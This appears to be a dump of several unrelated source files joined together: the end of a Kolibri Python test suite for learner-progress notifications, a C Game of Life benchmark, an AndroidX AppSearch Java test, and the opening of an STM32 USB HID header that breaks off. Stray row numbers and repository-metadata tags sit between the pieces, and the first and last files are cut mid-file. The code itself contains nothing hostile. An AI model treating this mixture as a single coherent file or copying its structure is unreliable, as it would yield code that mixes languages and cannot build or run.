user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
attemptlog2 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
start_lesson_assessment(attemptlog2, self.node_1.id, self.lesson_id)
assert create_notification.called is False
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_create_on_new_attempt_with_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
attemptlog2 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
parse_attemptslog(attemptlog2)
assert save_notifications.called is False
assert create_notification.called is False
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_update_lesson_assessment_with_three_wrong_attempts(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
update_lesson_assessment(attemptlog3, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_update_attempt_with_three_wrong_attempts(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
parse_attemptslog(attemptlog3)
assert save_notifications.called
create_notification.assert_called_once_with(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_update_lesson_assessment_with_three_wrong_attempts_on_same_attempt(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
update_lesson_assessment(attemptlog3, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_update_attempt_with_three_wrong_attempts_on_same_attempt(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
parse_attemptslog(attemptlog3)
assert save_notifications.called
create_notification.assert_called_once_with(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_assessment_with_three_wrong_attempts_no_started(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
start_lesson_assessment(attemptlog3, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_update_attempt_with_three_wrong_attempts_no_started(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
parse_attemptslog(attemptlog3)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
class BulkNotificationsAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = FacilityFactory.create()
cls.superuser = create_superuser(cls.facility)
cls.user1 = FacilityUserFactory.create(facility=cls.facility)
cls.user2 = FacilityUserFactory.create(facility=cls.facility)
# create classroom, learner group, add user1
cls.classroom = ClassroomFactory.create(parent=cls.facility)
cls.classroom.add_member(cls.user1)
cls.channel_id = "15f32edcec565396a1840c5413c92450"
cls.lesson_id = "15f32edcec565396a1840c5413c92452"
cls.content_ids = [
"15f32edcec565396a1840c5413c92451",
"15f32edcec565396a1840c5413c92452",
"15f32edcec565396a1840c5413c92453",
]
cls.contentnode_ids = [
"25f32edcec565396a1840c5413c92451",
"25f32edcec565396a1840c5413c92452",
"25f32edcec565396a1840c5413c92453",
]
cls.node_1 = ContentNode.objects.create(
title="Node 1",
available=True,
id=cls.contentnode_ids[0],
content_id=cls.content_ids[0],
channel_id=cls.channel_id,
kind=content_kinds.EXERCISE,
)
cls.node_2 = ContentNode.objects.create(
title="Node 2",
available=True,
id=cls.contentnode_ids[1],
content_id=cls.content_ids[1],
channel_id=cls.channel_id,
kind=content_kinds.EXERCISE,
)
cls.lesson = Lesson.objects.create(
id=cls.lesson_id,
title="My Lesson",
is_active=True,
created_by=cls.superuser,
collection=cls.classroom,
resources=json.dumps(
[
{
"contentnode_id": cls.node_1.id,
"content_id": cls.node_1.content_id,
"channel_id": cls.channel_id,
},
{
"contentnode_id": cls.node_2.id,
"content_id": cls.node_2.content_id,
"channel_id": cls.channel_id,
},
]
),
)
cls.lesson_assignment = LessonAssignment.objects.create(
lesson=cls.lesson, assigned_by=cls.superuser, collection=cls.classroom
)
cls.exam1 = Exam.objects.create(
title="title1",
question_count=1,
active=True,
collection=cls.classroom,
creator=cls.superuser,
)
cls.exam1_assignment = ExamAssignment.objects.create(
exam=cls.exam1, collection=cls.classroom, assigned_by=cls.superuser
)
cls.examlog1 = ExamLog.objects.create(
exam=cls.exam1,
user=cls.user1,
closed=True,
completion_timestamp=local_now(),
)
cls.examattemptlog1 = ExamAttemptLog.objects.create(
examlog=cls.examlog1,
user=cls.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
complete=False,
correct=0.0,
content_id=uuid.uuid4(),
)
cls.exam2 = Exam.objects.create(
title="title2",
question_count=1,
active=True,
collection=cls.classroom,
creator=cls.superuser,
)
cls.exam2_assignment = ExamAssignment.objects.create(
exam=cls.exam2, collection=cls.classroom, assigned_by=cls.superuser
)
cls.examlog2 = ExamLog.objects.create(
exam=cls.exam2,
user=cls.user1,
closed=False,
)
cls.summarylog1 = ContentSummaryLogFactory.create(
user=cls.user1,
content_id=cls.node_1.content_id,
channel_id=cls.channel_id,
)
cls.summarylog2 = ContentSummaryLogFactory.create(
user=cls.user1,
content_id=cls.node_2.content_id,
channel_id=cls.channel_id,
kind=content_kinds.EXERCISE,
)
cls.sessionlog = ContentSessionLogFactory(
user=cls.user1,
content_id=cls.summarylog1.content_id,
channel_id=cls.summarylog1.channel_id,
)
cls.mlog = masterylog = MasteryLog.objects.create(
summarylog=cls.summarylog1,
user=cls.user1,
start_timestamp=local_now(),
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
cls.attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=cls.sessionlog,
user=cls.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
cls.attemptlog2 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=cls.sessionlog,
user=cls.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
def _assert_call_contains(self, call, *args, **kwargs):
# Check args that are [1] in the call
for actual, expected in zip(call[1], args):
self.assertEqual(actual, expected)
# Check kwargs that are [2] in the call
for key, actual in call[2].items():
if key in kwargs:
expected = kwargs[key]
self.assertEqual(actual, expected)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_summarylog_notifications(
self, save_notifications, create_notification
):
LearnerProgressNotification.objects.all().delete()
batch_process_summarylogs([self.summarylog1.id, self.summarylog2.id])
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=self.summarylog1.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_2.id,
timestamp=self.summarylog2.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Lesson,
NotificationEventType.Started,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
timestamp=self.summarylog1.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_examlog_notifications(self, save_notifications, create_notification):
LearnerProgressNotification.objects.all().delete()
batch_process_examlogs(
[self.examlog1.id, self.examlog2.id], [self.examattemptlog1.id]
)
assert save_notifications.called
self._assert_call_contains(
create_notification.mock_calls[0],
NotificationObjectType.Quiz,
NotificationEventType.Started,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[1],
NotificationObjectType.Quiz,
NotificationEventType.Answered,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[2],
NotificationObjectType.Quiz,
NotificationEventType.Completed,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examlog1.completion_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_attemptlog_notifications(
self, save_notifications, create_notification
):
LearnerProgressNotification.objects.all().delete()
batch_process_attemptlogs([self.attemptlog1.id, self.attemptlog2.id])
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
self.attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=self.attemptlog1.end_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
self.attemptlog2.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=self.attemptlog2.end_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_attemptlog_needs_help(self, save_notifications, create_notification):
LearnerProgressNotification.objects.all().delete()
# more than 3 attempts will trigger the help notification
interactions = [{"type": "answer", "correct": 0}] * 3
attemptlog3 = AttemptLog.objects.create(
masterylog=self.mlog,
sessionlog=self.sessionlog,
user=self.user1,
start_timestamp=local_now(),
end_timestamp=local_now() + timedelta(seconds=10),
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
batch_process_attemptlogs(
[self.attemptlog1.id, self.attemptlog2.id, attemptlog3.id]
)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.end_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.end_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_batch_masterylog_from_examlog_notifications(
self, save_notifications, create_notification
):
LearnerProgressNotification.objects.all().delete()
migrate_from_exam_logs(ExamLog.objects.all())
batch_process_masterylogs_for_quizzes(
MasteryLog.objects.filter(summarylog__content_id=self.exam1.id)
.values_list("id", flat=True)
.order_by("complete"),
AttemptLog.objects.all().values_list("id", flat=True),
)
assert save_notifications.called
self._assert_call_contains(
create_notification.mock_calls[0],
NotificationObjectType.Quiz,
NotificationEventType.Answered,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[1],
NotificationObjectType.Quiz,
NotificationEventType.Started,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examattemptlog1.start_timestamp,
)
self._assert_call_contains(
create_notification.mock_calls[2],
NotificationObjectType.Quiz,
NotificationEventType.Completed,
self.user1.id,
self.classroom.id,
assignment_collections=[self.classroom.id],
quiz_id=self.exam1.id,
timestamp=self.examlog1.completion_timestamp,
)
| 27,497 |
9,724 |
<gh_stars>1000+
// From http://rosettacode.org/wiki/Conway%27s_Game_of_Life#C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define for_x for (int x = 0; x < w; x++)
#define for_y for (int y = 0; y < h; y++)
#define for_xy for_x for_y
void show(void *u, int w, int h)
{
int (*univ)[w] = u;
for_x printf("-"); printf("\n");
for_y {
for_x printf(univ[y][x] ? "[]" : " ");
printf("\n");
}
for_x printf("-"); printf("\n");
fflush(stdout);
}
void evolve(void *u, int w, int h)
{
unsigned (*univ)[w] = u;
unsigned new[h][w];
for_y for_x {
int n = 0;
for (int y1 = y - 1; y1 <= y + 1; y1++)
for (int x1 = x - 1; x1 <= x + 1; x1++)
if (univ[(y1 + h) % h][(x1 + w) % w])
n++;
if (univ[y][x]) n--;
new[y][x] = (n == 3 || (n == 2 && univ[y][x]));
}
for_y for_x univ[y][x] = new[y][x];
}
/* Deterministically tops the universe back up with live cells so the benchmark
   never settles into a dead or static state. */
void nudge(void *u, int w, int h)
{
unsigned (*univ)[w] = u;
int sum = 0;
for_xy sum += univ[y][x];
while (sum < (w*h)/8) {
int x = sum & (w-1);
int y = (sum*sum) & (h-1);
univ[y][x] = 1;
sum++;
}
}
/* Runs the simulation: i > 0 runs i benchmarked generations, i < 0 animates forever. */
void game(int w, int h, int i)
{
unsigned univ[h][w];
//for_xy univ[y][x] = rand() < RAND_MAX / 10 ? 1 : 0;
int acc = 0; // nonrandom generation, for benchmarking
for_xy {
acc += (x*17) % (y*3 + 1);
univ[y][x] = acc & 1;
}
while (i != 0) {
//show(univ, w, h);
evolve(univ, w, h);
if (i > 0) {
i--;
nudge(univ, w, h); // keep it interesting for benchmark
} else {
#if !__EMSCRIPTEN__
usleep(20000);
#endif
show(univ, w, h);
}
}
show(univ, w, h);
}
int main(int argc, char **argv)
{
int w, h, i;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: w = h = 32; i = 2500; break;
case 2: w = h = 32; i = 13000; break;
case 3: w = h = 32; i = 24000; break;
case 4: w = h = 32; i = 5*24000; break;
case 5: w = h = 32; i = 10*24000; break;
	default: printf("error: %d\n", arg); return -1;
}
printf("life: %d,%d,%d,%d\n", arg, w, h, i);
game(w, h, i);
return 0;
}
| 1,072 |
3,799 |
<reponame>semoro/androidx
/*
* Copyright 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package androidx.appsearch.cts.app;
import static com.google.common.truth.Truth.assertThat;
import androidx.appsearch.app.ReportSystemUsageRequest;
import org.junit.Test;
public class ReportSystemUsageRequestCtsTest {
@Test
public void testGettersAndSetters() {
ReportSystemUsageRequest request = new ReportSystemUsageRequest.Builder(
"package1", "database1", "namespace1", "id1")
.setUsageTimestampMillis(32)
.build();
assertThat(request.getPackageName()).isEqualTo("package1");
assertThat(request.getDatabaseName()).isEqualTo("database1");
assertThat(request.getNamespace()).isEqualTo("namespace1");
assertThat(request.getDocumentId()).isEqualTo("id1");
assertThat(request.getUsageTimestampMillis()).isEqualTo(32);
}
@Test
public void testUsageTimestampDefault() {
long startTs = System.currentTimeMillis();
ReportSystemUsageRequest request =
new ReportSystemUsageRequest.Builder("package1", "database1", "namespace1", "id1")
.build();
assertThat(request.getUsageTimestampMillis()).isAtLeast(startTs);
}
}
| 650 |
307 |
/**
******************************************************************************
* @file usbd_hid.h
* @author MCD Application Team
* @brief Header file for the usbd_hid_core.c file.
******************************************************************************
* @attention
*
* <h2><center>© Copyright (c) 2015 STMicroelectronics.
* All rights reserved.</center></h2>
*
* This software component is licensed by ST under Ultimate Liberty license
* SLA0044, the "License"; You may not use this file except in compliance with
* the License. You may obtain a copy of the License at:
* www.st.com/SLA0044
*
******************************************************************************
*/
/* Define to prevent recursive inclusion -------------------------------------*/
#ifndef __USB_HID_H
#define __USB_HID_H
#ifdef __cplusplus
extern "C" {
#endif
/* Includes ------------------------------------------------------------------*/
#include "usbd_ioreq.h"
/** @addtogroup STM32_USB_DEVICE_LIBRARY
* @{
*/
/** @defgroup USBD_HID
* @brief This file is the Header file for usbd_hid.c
* @{
*/
/** @defgroup USBD_HID_Exported_Defines
* @{
*/
#define HID_EPIN_ADDR 0x81U
#define HID_EPIN_SIZE 0x04U
#define USB_HID_CONFIG_DESC_SIZ 34U
